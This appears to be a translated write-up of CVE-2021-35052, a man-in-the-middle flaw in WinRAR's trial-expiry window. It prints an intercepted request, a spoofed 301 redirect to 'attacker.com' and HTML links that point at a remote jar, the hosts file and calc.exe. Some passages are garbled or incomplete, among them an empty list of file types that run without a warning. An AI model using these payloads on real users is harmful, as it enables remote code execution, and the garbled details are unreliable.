This article will describe a vulnerability in the trial version of WinRAR that has serious consequences for the management of third-party software. This vulnerability allows hackers to intercept and modify requests sent to application users. This vulnerability can be used for remote code execution (RCE) on the victim’s computer. This error is named code CVE-2021-35052.
What is Winrar?
WinRAR is an application to manage files stored on Windows operating system. It allows creating and decompressing popular archive formats such as RAR and ZIP. It is distributed as trial software, allowing users to experience the full features of the application for a certain number of days. After that, users can continue to use the free apps but have some features disabled.
Somewhat surprised because this error only appears in Internet Explorer browser.
After a few tests, it became apparent that when the trial period has expired, about one in three launches of the WinRAR.exe application, will show this message. This window uses mshtml.dll for Borland C++ included with WinRAR.
The author has set up Burp Suite as the default Windows proxy and to analyze the data sent from the WinRar error window to see if this bug can be exploited. When the request is sent over HTTPS, WinRAR users will receive a notification about the insecure self-signed certificate that Burp uses. However, in my experience, many users will click “Yes” to continue using the application.
Looking at this request we can see version (5.7.0) and Winrar x64
GET /?language=English&source=RARLAB&landingpage=expired&version=570&architecture=64 HTTP/1.1 Accept: */* Accept-Language: ru-RU UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3) Host: notifier.rarlab.com Connection: close Cookie: _wr=; _gid=; _ga=
Modify user feedback
Next, the author tried to modify the intercepted responses from WinRAR to the user. If the response code is changed to “301 Moved Permanently” then my redirect request to the malicious domain “attacker.com” will be cached and all requests will be redirected to “attacker. com”.
HTTP/1.1 301 Moved Permanently content-length: 0 Location: http://attacker.com/?language=English&source=RARLAB&landingpage=expired&version=570&architecture=64 connection: close
Remote code execution
This Man-in-the-Middle attack requires ARP spoofing. The author has tried several different attacks to see if this type of access is possible.
<a href="https://anonyviet.com/khai-thac-lo-hong-winrar-de-phat-tan-ma-doc-tren-windows/file://10.0.12.34/applications/test.jar">file://10.0.12.34/applications/test.jar</a><br> <a href="\10.0.12.34/applications/test.jar">\10.0.12.34/applications/test.jar</a><br> <a href="file://localhost/C:/windows/system32/drivers/etc/hosts">file://localhost/C:/windows/system32/drivers/etc/hosts</a><br> <a href="file:///C:/windows/system32/calc.exe">file:///C:/windows/system32/calc.exe</a><br> <a href="file:///C:\windows\system.ini">file:///C:\windows\system.ini</a><br>
The above code describes a spoofed response showing several possible attacks, such as running applications, retrieving server information, and opening calculator applications.
Most attacks are successful, but it should be noted that many attacks still result in additional Windows security warnings. To be successful, users need to click “Run”.
However, there are some file types that can run without a security warning. That is:
CVE-2018-20250 exists for Winrar 5.7 and below. Therefore you need to upgrade WinRar now to avoid being attacked by Hackers
One of the biggest challenges a company faces is managing third-party software. Once installed, third-party software has access to read, write, and modify data on devices that access the corporate network.
It is not possible to test every application that a user can install and therefore IT policy is important to avoid security risks.